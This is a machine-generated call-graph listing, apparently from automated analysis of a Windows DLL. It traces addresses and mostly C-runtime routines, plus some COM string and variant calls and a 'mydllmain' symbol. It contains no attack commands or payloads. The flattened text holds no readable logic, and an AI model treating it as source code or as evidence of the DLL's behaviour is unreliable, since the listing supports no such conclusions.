6cdf2311 __DllMainCRTStartup@12 13280->13284 13979 6cdf119f 13281->13979 13286 6cdf2318 __fread_nolock 13284->13286 13960 6cdf25a0 13284->13960 13286->13229 13288 6cdf1c99 13287->13288 13289 6cdf1cb1 13287->13289 14031 6cdf1053 13288->14031 13291 6cdf22df __DllMainCRTStartup@12 52 API calls 13289->13291 13293 6cdf1cbd 13291->13293 14035 6cdf1b83 13293->14035 13296 6cdf1d4c VariantClear VariantClear VariantClear VariantClear 13297 6cdf1d89 13296->13297 13298 6cdf1d74 13296->13298 14043 6cdf11aa 13297->14043 13300 6cdf1053 __DllMainCRTStartup@12 85 API calls 13298->13300 13314 6cdf1d7f CoUninitialize 13300->13314 13301 6cdf21fa __DllMainCRTStartup@12 13302 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13301->13302 13303 6cdf2255 13302->13303 13303->13195 13305 6cdf1d9b 14052 6cdf1216 13305->14052 13307 6cdf1dc9 13307->13298 13308 6cdf1dd5 13307->13308 13309 6cdf1e0a 13308->13309 13310 6cdf1df5 13308->13310 13312 6cdf11aa __DllMainCRTStartup@12 54 API calls 13309->13312 13318 6cdf1e1e 13309->13318 13311 6cdf1053 __DllMainCRTStartup@12 85 API calls 13310->13311 13311->13314 13315 6cdf1e36 13312->13315 13313 6cdf1053 __DllMainCRTStartup@12 85 API calls 13313->13314 13314->13301 13316 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13315->13316 13317 6cdf1e5e 13316->13317 13317->13318 13319 6cdf11aa __DllMainCRTStartup@12 54 API calls 13317->13319 13318->13313 13320 6cdf1f54 13319->13320 13321 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13320->13321 13322 6cdf1f7c 13321->13322 13323 6cdf1f8b 13322->13323 13325 6cdf1053 __DllMainCRTStartup@12 85 API calls 13322->13325 13324 6cdf11aa __DllMainCRTStartup@12 54 API calls 13323->13324 13326 6cdf1faa 13324->13326 13325->13323 13327 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13326->13327 13328 6cdf1fd2 13327->13328 13328->13318 13329 6cdf11aa __DllMainCRTStartup@12 54 API calls 13328->13329 13330 6cdf2076 13329->13330 13331 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13330->13331 13332 6cdf209c 13331->13332 13333 6cdf11aa __DllMainCRTStartup@12 54 API calls 13332->13333 13334 6cdf20b3 13333->13334 13335 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13334->13335 13336 6cdf20db 13335->13336 13336->13318 13337 6cdf20f3 SysAllocString 13336->13337 13338 6cdf225a 13337->13338 13339 6cdf2113 VariantInit VariantInit 13337->13339 14056 6cdf2b50 mydllmain 13338->14056 13340 6cdf11aa __DllMainCRTStartup@12 54 API calls 13339->13340 13343 6cdf2156 13340->13343 13344 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13343->13344 13345 6cdf21a9 VariantClear VariantClear VariantClear 13344->13345 13345->13318 13346 6cdf21f0 13345->13346 13347 6cdf1053 __DllMainCRTStartup@12 85 API calls 13346->13347 13347->13301 13370 6cdfd3c8 GetLastError 13348->13370 13350 6cdfafad 13351 6cdfbcda 13350->13351 13442 6cdfbc26 13351->13442 13355 6cdfaef1 __FrameHandler3::FrameUnwindToState 13353->13355 13354 6cdfaef8 13356 6cdfe211 __dosmaperr 17 API calls 13354->13356 13355->13354 13357 6cdfaf1a 13355->13357 13358 6cdfaefd 13356->13358 13359 6cdfaf1f 13357->13359 13360 6cdfaf2c 13357->13360 13361 6cdfbcda __wsopen_s 50 API calls 13358->13361 13362 6cdfe211 __dosmaperr 17 API calls 13359->13362 13448 6cdfff21 13360->13448 13364 6cdfaf08 13361->13364 13362->13364 13364->13239 13364->13240 13366 6cdfaf3b 13368 6cdfe211 __dosmaperr 17 API calls 13366->13368 13367 6cdfaf48 __DllMainCRTStartup@12 13456 6cdfaf84 13367->13456 13368->13364 13371 6cdfd3de 13370->13371 13372 6cdfd3e4 13370->13372 13393 6cdff9e2 13371->13393 13376 6cdfd3e8 SetLastError 13372->13376 13399 6cdffa21 13372->13399 13376->13350 13380 6cdfd42e 13383 6cdffa21 _unexpected 7 API calls 13380->13383 13381 6cdfd41d 13382 6cdffa21 _unexpected 7 API calls 13381->13382 13390 6cdfd42b 13382->13390 13384 6cdfd43a 13383->13384 13385 6cdfd43e 13384->13385 13386 6cdfd455 13384->13386 13387 6cdffa21 _unexpected 7 API calls 13385->13387 13412 6cdfd079 13386->13412 13387->13390 13388 6cdfe224 ___free_lconv_mon 15 API calls 13388->13376 13390->13388 13392 6cdfe224 ___free_lconv_mon 15 API calls 13392->13376 13417 6cdff880 13393->13417 13395 6cdff9fe 13396 6cdffa19 TlsGetValue 13395->13396 13397 6cdffa07 mydllmain 13395->13397 13398 6cdffa14 13397->13398 13398->13372 13400 6cdff880 _unexpected 5 API calls 13399->13400 13401 6cdffa3d 13400->13401 13402 6cdffa5b TlsSetValue 13401->13402 13403 6cdffa46 mydllmain 13401->13403 13404 6cdfd400 13403->13404 13404->13376 13405 6cdff70a 13404->13405 13410 6cdff717 _unexpected 13405->13410 13406 6cdff757 13408 6cdfe211 __dosmaperr 16 API calls 13406->13408 13407 6cdff742 HeapAlloc 13409 6cdfd415 13407->13409 13407->13410 13408->13409 13409->13380 13409->13381 13410->13406 13410->13407 13423 6cdfbd70 13410->13423 13428 6cdfcf0d 13412->13428 13418 6cdff8b0 13417->13418 13422 6cdff8ac _unexpected 13417->13422 13419 6cdff7b5 _unexpected LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 13418->13419 13418->13422 13420 6cdff8c4 13419->13420 13421 6cdff8ca GetProcAddress 13420->13421 13420->13422 13421->13422 13422->13395 13424 6cdfbd9c _unexpected EnterCriticalSection LeaveCriticalSection 13423->13424 13425 6cdfbd7b 13424->13425 13426 6cdfbd8e 13425->13426 13427 6cdfbd81 mydllmain 13425->13427 13426->13410 13427->13426 13429 6cdfcf19 __FrameHandler3::FrameUnwindToState 13428->13429 13430 6ce015d1 CallUnexpected EnterCriticalSection 13429->13430 13431 6cdfcf23 13430->13431 13432 6cdfcf53 _unexpected LeaveCriticalSection 13431->13432 13433 6cdfcf41 13432->13433 13434 6cdfd01f 13433->13434 13435 6cdfd02b __FrameHandler3::FrameUnwindToState 13434->13435 13436 6ce015d1 CallUnexpected EnterCriticalSection 13435->13436 13437 6cdfd035 13436->13437 13438 6cdfd200 _unexpected 17 API calls 13437->13438 13439 6cdfd04d 13438->13439 13440 6cdfd06d _unexpected LeaveCriticalSection 13439->13440 13441 6cdfd05b 13440->13441 13441->13392 13443 6cdfbc38 __wsopen_s 13442->13443 13444 6cdfbc5d __wsopen_s 33 API calls 13443->13444 13445 6cdfbc50 13444->13445 13446 6cdf5f8b __wsopen_s 50 API calls 13445->13446 13447 6cdfbc5b 13446->13447 13449 6cdfff2d __FrameHandler3::FrameUnwindToState 13448->13449 13460 6ce015d1 EnterCriticalSection 13449->13460 13451 6cdfff3b 13461 6cdfffc5 13451->13461 13457 6cdfaf88 __DllMainCRTStartup@12 13456->13457 13487 6cdfaed1 LeaveCriticalSection 13457->13487 13459 6cdfaf99 13459->13364 13460->13451 13467 6cdfffe8 13461->13467 13462 6ce00040 13463 6cdff70a _unexpected 17 API calls 13462->13463 13464 6ce00049 13463->13464 13466 6cdfe224 ___free_lconv_mon 17 API calls 13464->13466 13468 6ce00052 13466->13468 13467->13462 13467->13467 13470 6cdfff48 13467->13470 13477 6cdfaebd EnterCriticalSection 13467->13477 13478 6cdfaed1 LeaveCriticalSection 13467->13478 13468->13470 13479 6cdffa63 13468->13479 13474 6cdfff81 13470->13474 13486 6ce01619 LeaveCriticalSection 13474->13486 13476 6cdfaf35 13476->13366 13476->13367 13477->13467 13478->13467 13480 6cdff880 _unexpected 5 API calls 13479->13480 13481 6cdffa7f 13480->13481 13482 6cdffa9d InitializeCriticalSectionAndSpinCount 13481->13482 13483 6cdffa88 mydllmain 13481->13483 13484 6cdffa9b 13482->13484 13483->13484 13485 6cdfaebd EnterCriticalSection 13484->13485 13485->13470 13486->13476 13487->13459 13490 6cdfb1bd __FrameHandler3::FrameUnwindToState 13488->13490 13489 6cdfb1c3 13491 6cdfbc5d __wsopen_s 33 API calls 13489->13491 13490->13489 13492 6cdfb206 13490->13492 13498 6cdfb1de 13491->13498 13499 6cdfaebd EnterCriticalSection 13492->13499 13494 6cdfb212 13500 6cdfb334 13494->13500 13496 6cdfb228 13509 6cdfb251 13496->13509 13498->13245 13499->13494 13501 6cdfb35a 13500->13501 13502 6cdfb347 13500->13502 13512 6cdfb25b 13501->13512 13502->13496 13504 6cdfb37d __DllMainCRTStartup@12 13505 6cdfb40b 13504->13505 13516 6cdffe0a 13504->13516 13505->13496 13555 6cdfaed1 LeaveCriticalSection 13509->13555 13511 6cdfb259 13511->13498 13513 6cdfb26c 13512->13513 13515 6cdfb2c4 __DllMainCRTStartup@12 13512->13515 13513->13515 13525 6cdfceaf 13513->13525 13515->13504 13517 6cdfb3ab 13516->13517 13518 6cdffe23 13516->13518 13522 6cdfceef 13517->13522 13518->13517 13531 6cdfcc82 13518->13531 13520 6cdffe3f 13538 6ce00e71 13520->13538 13549 6cdfcdce 13522->13549 13524 6cdfcf08 13524->13505 13526 6cdfcec3 __wsopen_s 13525->13526 13527 6cdfcdce __wsopen_s 52 API calls 13526->13527 13528 6cdfced8 13527->13528 13529 6cdf5f8b __wsopen_s 50 API calls 13528->13529 13530 6cdfcee7 13529->13530 13530->13515 13532 6cdfcc8e 13531->13532 13533 6cdfcca3 13531->13533 13534 6cdfe211 __dosmaperr 17 API calls 13532->13534 13533->13520 13535 6cdfcc93 13534->13535 13536 6cdfbcda __wsopen_s 50 API calls 13535->13536 13537 6cdfcc9e 13536->13537 13537->13520 13539 6ce00e7d __FrameHandler3::FrameUnwindToState 13538->13539 13540 6ce00ebe 13539->13540 13541 6ce00f04 13539->13541 13548 6ce00e85 13539->13548 13542 6cdfbc5d __wsopen_s 33 API calls 13540->13542 13543 6ce03114 __wsopen_s EnterCriticalSection 13541->13543 13542->13548 13544 6ce00f0a 13543->13544 13545 6ce00f28 13544->13545 13546 6ce00f82 __wsopen_s 73 API calls 13544->13546 13547 6ce00f7a ___scrt_uninitialize_crt LeaveCriticalSection 13545->13547 13546->13545 13547->13548 13548->13517 13550 6ce03390 __wsopen_s 50 API calls 13549->13550 13551 6cdfcde0 13550->13551 13552 6cdfcdfc SetFilePointerEx 13551->13552 13553 6cdfcde8 __wsopen_s 13551->13553 13552->13553 13554 6cdfce14 GetLastError 13552->13554 13553->13524 13554->13553 13555->13511 13557 6cdf5cfc __FrameHandler3::FrameUnwindToState 13556->13557 13558 6cdf5d24 13557->13558 13559 6cdf5d03 13557->13559 13567 6cdfaebd EnterCriticalSection 13558->13567 13560 6cdfbc5d __wsopen_s 33 API calls 13559->13560 13562 6cdf5d1c 13560->13562 13562->13251 13563 6cdf5d2f 13568 6cdf5d70 13563->13568 13567->13563 13574 6cdf5da2 13568->13574 13570 6cdf5d3e 13571 6cdf5d66 13570->13571 13609 6cdfaed1 LeaveCriticalSection 13571->13609 13573 6cdf5d6e 13573->13562 13575 6cdf5dd9 13574->13575 13576 6cdf5db1 13574->13576 13578 6cdfcc82 __fread_nolock 50 API calls 13575->13578 13577 6cdfbc5d __wsopen_s 33 API calls 13576->13577 13579 6cdf5dcc __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13577->13579 13580 6cdf5de2 13578->13580 13579->13570 13587 6cdfce91 13580->13587 13583 6cdf5e8c 13590 6cdf6192 13583->13590 13585 6cdf5ea3 __DllMainCRTStartup@12 13585->13579 13602 6cdf5fc7 13585->13602 13588 6cdfcca9 __DllMainCRTStartup@12 54 API calls 13587->13588 13589 6cdf5e00 13588->13589 13589->13579 13589->13583 13589->13585 13591 6cdf61a1 __wsopen_s 13590->13591 13592 6cdfcc82 __fread_nolock 50 API calls 13591->13592 13594 6cdf61bd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13592->13594 13593 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13595 6cdf633b 13593->13595 13596 6cdfce91 __DllMainCRTStartup@12 54 API calls 13594->13596 13601 6cdf61c9 13594->13601 13595->13579 13597 6cdf621d 13596->13597 13598 6cdf624f ReadFile 13597->13598 13597->13601 13599 6cdf6276 13598->13599 13598->13601 13600 6cdfce91 __DllMainCRTStartup@12 54 API calls 13599->13600 13600->13601 13601->13593 13603 6cdfcc82 __fread_nolock 50 API calls 13602->13603 13604 6cdf5fda 13603->13604 13605 6cdfce91 __DllMainCRTStartup@12 54 API calls 13604->13605 13608 6cdf6024 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 13604->13608 13606 6cdf6081 13605->13606 13607 6cdfce91 __DllMainCRTStartup@12 54 API calls 13606->13607 13606->13608 13607->13608 13608->13579 13609->13573 13611 6cdfafee __FrameHandler3::FrameUnwindToState 13610->13611 13612 6cdfb01b 13611->13612 13613 6cdfaff8 13611->13613 13620 6cdfb013 __DllMainCRTStartup@12 13612->13620 13621 6cdfaebd EnterCriticalSection 13612->13621 13614 6cdfbc5d __wsopen_s 33 API calls 13613->13614 13614->13620 13616 6cdfb039 13622 6cdfb079 13616->13622 13618 6cdfb046 13636 6cdfb071 13618->13636 13620->13256 13621->13616 13623 6cdfb0a9 13622->13623 13624 6cdfb086 13622->13624 13626 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13623->13626 13627 6cdfb0a1 __DllMainCRTStartup@12 13623->13627 13625 6cdfbc5d __wsopen_s 33 API calls 13624->13625 13625->13627 13628 6cdfb0c1 13626->13628 13627->13618 13639 6cdffee1 13628->13639 13631 6cdfcc82 __fread_nolock 50 API calls 13632 6cdfb0d5 13631->13632 13643 6ce00525 13632->13643 13635 6cdfe224 ___free_lconv_mon 17 API calls 13635->13627 13658 6cdfaed1 LeaveCriticalSection 13636->13658 13638 6cdfb077 13638->13620 13640 6cdfb0c9 13639->13640 13641 6cdffef8 13639->13641 13640->13631 13641->13640 13642 6cdfe224 ___free_lconv_mon 17 API calls 13641->13642 13642->13640 13645 6ce0054e 13643->13645 13647 6cdfb0dc 13643->13647 13644 6ce0059d 13646 6cdfbc5d __wsopen_s 33 API calls 13644->13646 13645->13644 13648 6ce00575 13645->13648 13646->13647 13647->13627 13647->13635 13650 6ce00494 13648->13650 13651 6ce004a0 __FrameHandler3::FrameUnwindToState 13650->13651 13652 6ce03114 __wsopen_s EnterCriticalSection 13651->13652 13653 6ce004ae 13652->13653 13654 6ce004df 13653->13654 13655 6ce005f8 __wsopen_s 53 API calls 13653->13655 13656 6ce00519 __DllMainCRTStartup@12 LeaveCriticalSection 13654->13656 13655->13654 13657 6ce00502 13656->13657 13657->13647 13658->13638 13660 6cdfb9a3 __FrameHandler3::FrameUnwindToState 13659->13660 13661 6cdfb9ed 13660->13661 13663 6cdfb9b6 __fread_nolock 13660->13663 13671 6cdfb992 13660->13671 13672 6cdfaebd EnterCriticalSection 13661->13672 13664 6cdfe211 __dosmaperr 17 API calls 13663->13664 13666 6cdfb9d0 13664->13666 13665 6cdfb9f7 13673 6cdfb7a1 13665->13673 13668 6cdfbcda __wsopen_s 50 API calls 13666->13668 13668->13671 13671->13204 13672->13665 13676 6cdfb7b3 __fread_nolock 13673->13676 13679 6cdfb7d0 13673->13679 13674 6cdfb7c0 13675 6cdfe211 __dosmaperr 17 API calls 13674->13675 13677 6cdfb7c5 13675->13677 13676->13674 13676->13679 13681 6cdfb811 __fread_nolock 13676->13681 13678 6cdfbcda __wsopen_s 50 API calls 13677->13678 13678->13679 13686 6cdfba2c 13679->13686 13680 6cdfb93c __fread_nolock 13684 6cdfe211 __dosmaperr 17 API calls 13680->13684 13681->13679 13681->13680 13683 6cdfcc82 __fread_nolock 50 API calls 13681->13683 13689 6cdfba34 13681->13689 13703 6cdfdbf7 13681->13703 13683->13681 13684->13677 13809 6cdfaed1 LeaveCriticalSection 13686->13809 13688 6cdfba32 13688->13671 13690 6cdfba45 13689->13690 13694 6cdfba41 __fread_nolock 13689->13694 13691 6cdfba4c 13690->13691 13696 6cdfba5f __fread_nolock 13690->13696 13692 6cdfe211 __dosmaperr 17 API calls 13691->13692 13693 6cdfba51 13692->13693 13695 6cdfbcda __wsopen_s 50 API calls 13693->13695 13694->13681 13695->13694 13696->13694 13697 6cdfba8d 13696->13697 13698 6cdfba96 13696->13698 13699 6cdfe211 __dosmaperr 17 API calls 13697->13699 13698->13694 13700 6cdfe211 __dosmaperr 17 API calls 13698->13700 13701 6cdfba92 13699->13701 13700->13701 13702 6cdfbcda __wsopen_s 50 API calls 13701->13702 13702->13694 13704 6cdfdc09 13703->13704 13705 6cdfdc21 13703->13705 13766 6cdfe1fe 13704->13766 13706 6cdfdf63 13705->13706 13710 6cdfdc64 13705->13710 13709 6cdfe1fe __dosmaperr 17 API calls 13706->13709 13712 6cdfdf68 13709->13712 13713 6cdfdc6f 13710->13713 13717 6cdfdc16 13710->13717 13721 6cdfdc9f 13710->13721 13711 6cdfe211 __dosmaperr 17 API calls 13711->13717 13714 6cdfe211 __dosmaperr 17 API calls 13712->13714 13716 6cdfe1fe __dosmaperr 17 API calls 13713->13716 13715 6cdfdc7c 13714->13715 13719 6cdfbcda __wsopen_s 50 API calls 13715->13719 13718 6cdfdc74 13716->13718 13717->13681 13720 6cdfe211 __dosmaperr 17 API calls 13718->13720 13719->13717 13720->13715 13722 6cdfdcb8 13721->13722 13723 6cdfdcc5 13721->13723 13724 6cdfdcf3 13721->13724 13722->13723 13730 6cdfdce1 13722->13730 13725 6cdfe1fe __dosmaperr 17 API calls 13723->13725 13769 6cdfe25e 13724->13769 13726 6cdfdcca 13725->13726 13728 6cdfe211 __dosmaperr 17 API calls 13726->13728 13732 6cdfdcd1 13728->13732 13776 6ce03b25 13730->13776 13735 6cdfbcda __wsopen_s 50 API calls 13732->13735 13733 6cdfde3f 13736 6cdfdeb3 13733->13736 13739 6cdfde58 GetConsoleMode 13733->13739 13734 6cdfe224 ___free_lconv_mon 17 API calls 13737 6cdfdd0d 13734->13737 13765 6cdfdcdc __fread_nolock 13735->13765 13738 6cdfdeb7 ReadFile 13736->13738 13740 6cdfe224 ___free_lconv_mon 17 API calls 13737->13740 13741 6cdfdecf 13738->13741 13742 6cdfdf2b GetLastError 13738->13742 13739->13736 13743 6cdfde69 13739->13743 13744 6cdfdd14 13740->13744 13741->13742 13749 6cdfdea8 13741->13749 13747 6cdfde8f 13742->13747 13748 6cdfdf38 13742->13748 13743->13738 13750 6cdfde6f ReadConsoleW 13743->13750 13745 6cdfdd1e 13744->13745 13746 6cdfdd39 13744->13746 13751 6cdfe211 __dosmaperr 17 API calls 13745->13751 13753 6cdfceaf __wsopen_s 52 API calls 13746->13753 13747->13765 13785 6cdfe1b7 13747->13785 13752 6cdfe211 __dosmaperr 17 API calls 13748->13752 13761 6cdfdf0b 13749->13761 13762 6cdfdef4 13749->13762 13749->13765 13750->13749 13754 6cdfde89 GetLastError 13750->13754 13756 6cdfdd23 13751->13756 13757 6cdfdf3d 13752->13757 13753->13730 13754->13747 13755 6cdfe224 ___free_lconv_mon 17 API calls 13755->13717 13759 6cdfe1fe __dosmaperr 17 API calls 13756->13759 13760 6cdfe1fe __dosmaperr 17 API calls 13757->13760 13759->13765 13760->13765 13761->13765 13803 6cdfd74f 13761->13803 13790 6cdfd909 13762->13790 13765->13755 13767 6cdfd3c8 __dosmaperr 17 API calls 13766->13767 13768 6cdfdc0e 13767->13768 13768->13711 13770 6cdfe29c 13769->13770 13774 6cdfe26c _unexpected 13769->13774 13771 6cdfe211 __dosmaperr 17 API calls 13770->13771 13773 6cdfdd04 13771->13773 13772 6cdfe287 HeapAlloc 13772->13773 13772->13774 13773->13734 13774->13770 13774->13772 13775 6cdfbd70 _unexpected mydllmain EnterCriticalSection LeaveCriticalSection 13774->13775 13775->13774 13777 6ce03b32 13776->13777 13778 6ce03b3f 13776->13778 13779 6cdfe211 __dosmaperr 17 API calls 13777->13779 13780 6ce03b4b 13778->13780 13781 6cdfe211 __dosmaperr 17 API calls 13778->13781 13782 6ce03b37 13779->13782 13780->13733 13783 6ce03b6c 13781->13783 13782->13733 13784 6cdfbcda __wsopen_s 50 API calls 13783->13784 13784->13782 13786 6cdfe1fe __dosmaperr 17 API calls 13785->13786 13787 6cdfe1c2 __dosmaperr 13786->13787 13788 6cdfe211 __dosmaperr 17 API calls 13787->13788 13789 6cdfe1d5 13788->13789 13789->13765 13791 6cdfd602 __fread_nolock 53 API calls 13790->13791 13795 6cdfd920 13791->13795 13792 6ce0293d __fread_nolock MultiByteToWideChar 13794 6cdfda1d 13792->13794 13793 6cdfd99b 13796 6cdfe211 __dosmaperr 17 API calls 13793->13796 13797 6cdfda26 GetLastError 13794->13797 13799 6cdfd951 13794->13799 13795->13793 13798 6cdfd9ab 13795->13798 13795->13799 13802 6cdfd965 13795->13802 13796->13799 13800 6cdfe1b7 __dosmaperr 17 API calls 13797->13800 13801 6cdfceaf __wsopen_s 52 API calls 13798->13801 13798->13802 13799->13765 13800->13799 13801->13802 13802->13792 13804 6cdfd789 13803->13804 13805 6cdfd81f ReadFile 13804->13805 13806 6cdfd81a 13804->13806 13805->13806 13807 6cdfd83c 13805->13807 13806->13765 13807->13806 13808 6cdfceaf __wsopen_s 52 API calls 13807->13808 13808->13806 13809->13688 13826 6cdfa5bb 13810->13826 13812 6cdfaa89 13815 6cdfaaae 13812->13815 13817 6cdfa560 __wsopen_s 50 API calls 13812->13817 13813 6cdfaa56 13816 6cdfbc5d __wsopen_s 33 API calls 13813->13816 13814 6cdfaa41 13814->13812 13814->13813 13825 6cdfaa71 __DllMainCRTStartup@12 13814->13825 13833 6cdfacf6 13815->13833 13816->13825 13817->13815 13819 6cdfacf6 __DllMainCRTStartup@12 53 API calls 13820 6cdfaac3 13819->13820 13820->13819 13821 6cdfaaec 13820->13821 13824 6cdfab77 __aulldiv __DllMainCRTStartup@12 13821->13824 13840 6cdfa502 13821->13840 13823 6cdfa502 __DllMainCRTStartup@12 50 API calls 13823->13825 13824->13823 13825->13265 13827 6cdfa5d3 13826->13827 13828 6cdfa5c0 13826->13828 13827->13814 13829 6cdfe211 __dosmaperr 17 API calls 13828->13829 13830 6cdfa5c5 13829->13830 13831 6cdfbcda __wsopen_s 50 API calls 13830->13831 13832 6cdfa5d0 13831->13832 13832->13814 13834 6cdfad02 13833->13834 13836 6cdfad18 13833->13836 13846 6cdff599 13834->13846 13835 6cdfad28 13835->13820 13836->13835 13851 6cdff63f 13836->13851 13838 6cdfad0d __DllMainCRTStartup@12 13838->13820 13841 6cdfa527 13840->13841 13842 6cdfa513 13840->13842 13841->13824 13842->13841 13843 6cdfe211 __dosmaperr 17 API calls 13842->13843 13844 6cdfa51c 13843->13844 13845 6cdfbcda __wsopen_s 50 API calls 13844->13845 13845->13841 13858 6cdfd277 GetLastError 13846->13858 13889 6cdff5bd 13851->13889 13855 6cdff66c 13856 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13855->13856 13857 6cdff708 13856->13857 13857->13835 13859 6cdfd28d 13858->13859 13860 6cdfd293 13858->13860 13861 6cdff9e2 _unexpected 7 API calls 13859->13861 13862 6cdffa21 _unexpected 7 API calls 13860->13862 13864 6cdfd297 SetLastError 13860->13864 13861->13860 13863 6cdfd2af 13862->13863 13863->13864 13865 6cdff70a _unexpected 17 API calls 13863->13865 13868 6cdfd32c 13864->13868 13869 6cdfd327 13864->13869 13867 6cdfd2c4 13865->13867 13870 6cdfd2dd 13867->13870 13871 6cdfd2cc 13867->13871 13872 6cdfcb25 CallUnexpected 48 API calls 13868->13872 13885 6cdfe57e 13869->13885 13874 6cdffa21 _unexpected 7 API calls 13870->13874 13873 6cdffa21 _unexpected 7 API calls 13871->13873 13875 6cdfd331 13872->13875 13876 6cdfd2da 13873->13876 13877 6cdfd2e9 13874->13877 13881 6cdfe224 ___free_lconv_mon 17 API calls 13876->13881 13878 6cdfd2ed 13877->13878 13879 6cdfd304 13877->13879 13880 6cdffa21 _unexpected 7 API calls 13878->13880 13882 6cdfd079 _unexpected 17 API calls 13879->13882 13880->13876 13881->13864 13883 6cdfd30f 13882->13883 13884 6cdfe224 ___free_lconv_mon 17 API calls 13883->13884 13884->13864 13886 6cdfe591 13885->13886 13888 6cdfe5a6 13885->13888 13887 6ce036c3 __wsopen_s 50 API calls 13886->13887 13886->13888 13887->13888 13888->13838 13890 6cdff5db 13889->13890 13896 6cdff5d4 13889->13896 13891 6cdfd277 _unexpected 50 API calls 13890->13891 13890->13896 13892 6cdff5fc 13891->13892 13893 6cdfe57e __DllMainCRTStartup@12 50 API calls 13892->13893 13894 6cdff612 13893->13894 13895 6cdfe5dc __DllMainCRTStartup@12 50 API calls 13894->13895 13895->13896 13896->13855 13897 6ce03a04 13896->13897 13898 6cdff5bd __DllMainCRTStartup@12 50 API calls 13897->13898 13899 6ce03a24 13898->13899 13900 6ce0293d __fread_nolock MultiByteToWideChar 13899->13900 13903 6ce03a51 13900->13903 13901 6ce03ae0 13904 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13901->13904 13902 6ce03ad8 13905 6ce03b05 __freea 17 API calls 13902->13905 13903->13901 13903->13902 13906 6cdfe25e __fread_nolock 18 API calls 13903->13906 13908 6ce03a76 __fread_nolock __alloca_probe_16 13903->13908 13907 6ce03b03 13904->13907 13905->13901 13906->13908 13907->13855 13908->13902 13909 6ce0293d __fread_nolock MultiByteToWideChar 13908->13909 13910 6ce03abf 13909->13910 13910->13902 13911 6ce03ac6 GetStringTypeW 13910->13911 13911->13902 13913 6cdfb50f 13912->13913 13918 6cdfb537 13912->13918 13914 6cdfb53e 13913->13914 13915 6cdfb51c 13913->13915 13913->13918 13920 6cdfb45a 13914->13920 13916 6cdfbc5d __wsopen_s 33 API calls 13915->13916 13916->13918 13918->13271 13921 6cdfb466 __FrameHandler3::FrameUnwindToState 13920->13921 13928 6cdfaebd EnterCriticalSection 13921->13928 13923 6cdfb474 13929 6cdfb4b5 13923->13929 13928->13923 13939 6cdff4b0 13929->13939 13936 6cdfb4a9 13959 6cdfaed1 LeaveCriticalSection 13936->13959 13938 6cdfb492 13938->13271 13940 6cdff472 __DllMainCRTStartup@12 50 API calls 13939->13940 13942 6cdff4c1 __DllMainCRTStartup@12 13940->13942 13941 6cdfb4cd 13946 6cdfb578 13941->13946 13942->13941 13943 6cdfe25e __fread_nolock 18 API calls 13942->13943 13944 6cdff51a 13943->13944 13945 6cdfe224 ___free_lconv_mon 17 API calls 13944->13945 13945->13941 13948 6cdfb58a 13946->13948 13954 6cdfb4eb 13946->13954 13947 6cdfb598 13949 6cdfbc5d __wsopen_s 33 API calls 13947->13949 13948->13947 13952 6cdfb5ce __fread_nolock __DllMainCRTStartup@12 13948->13952 13948->13954 13949->13954 13950 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13950->13952 13951 6cdfcc82 __fread_nolock 50 API calls 13951->13952 13952->13950 13952->13951 13953 6ce00e71 ___scrt_uninitialize_crt 75 API calls 13952->13953 13952->13954 13953->13952 13955 6cdff55b 13954->13955 13956 6cdfb481 13955->13956 13957 6cdff566 13955->13957 13956->13936 13957->13956 13958 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13957->13958 13958->13956 13959->13938 13961 6cdf25ae 13960->13961 13962 6cdf25e9 13960->13962 13964 6cdf25b7 13961->13964 13965 6cdf25d6 13961->13965 13995 6cdf1152 13962->13995 13964->13962 13968 6cdf25be 13964->13968 13966 6cdf25cb 13965->13966 13970 6cdf2d38 __DllMainCRTStartup@12 52 API calls 13965->13970 13966->13286 13967 6cdf25c4 13967->13966 14001 6cdfbcea 13967->14001 13982 6cdf2d38 13968->13982 13970->13966 14020 6cdf2b24 13979->14020 13983 6cdf2d3d ___std_exception_copy 13982->13983 13984 6cdf2d57 13983->13984 13985 6cdfbd70 _unexpected 3 API calls 13983->13985 13986 6cdf2d59 13983->13986 13984->13967 13985->13983 13987 6cdf1152 Concurrency::cancel_current_task 13986->13987 13989 6cdf2d63 __DllMainCRTStartup@12 13986->13989 14006 6cdf3fdc 13987->14006 13991 6cdf3fdc std::_Xinvalid_argument 2 API calls 13989->13991 13990 6cdf116e 14011 6cdf10c8 13990->14011 13993 6cdf326f 13991->13993 13996 6cdf1160 Concurrency::cancel_current_task 13995->13996 13997 6cdf3fdc std::_Xinvalid_argument 2 API calls 13996->13997 13998 6cdf116e 13997->13998 13999 6cdf10c8 std::bad_exception::bad_exception 50 API calls 13998->13999 14000 6cdf117b 13999->14000 14000->13967 14002 6cdfbc26 __wsopen_s 50 API calls 14001->14002 14003 6cdfbcf9 14002->14003 14004 6cdfbd07 __wsopen_s 11 API calls 14003->14004 14005 6cdfbd06 14004->14005 14007 6cdf3ff6 14006->14007 14008 6cdf4023 RaiseException 14006->14008 14009 6cdf3ffb mydllmain 14007->14009 14010 6cdf4014 14007->14010 14008->13990 14009->14010 14010->14008 14014 6cdf3dae 14011->14014 14015 6cdf3dbb ___std_exception_copy 14014->14015 14019 6cdf10e9 14014->14019 14016 6cdf3de8 14015->14016 14017 6cdfcb69 ___std_exception_copy 50 API calls 14015->14017 14015->14019 14018 6cdfb786 ___std_exception_copy 17 API calls 14016->14018 14017->14016 14018->14019 14019->13967 14025 6cdf2abd 14020->14025 14023 6cdf3fdc std::_Xinvalid_argument 2 API calls 14024 6cdf2b43 14023->14024 14028 6cdf2a6d 14025->14028 14029 6cdf3dae ___std_exception_copy 50 API calls 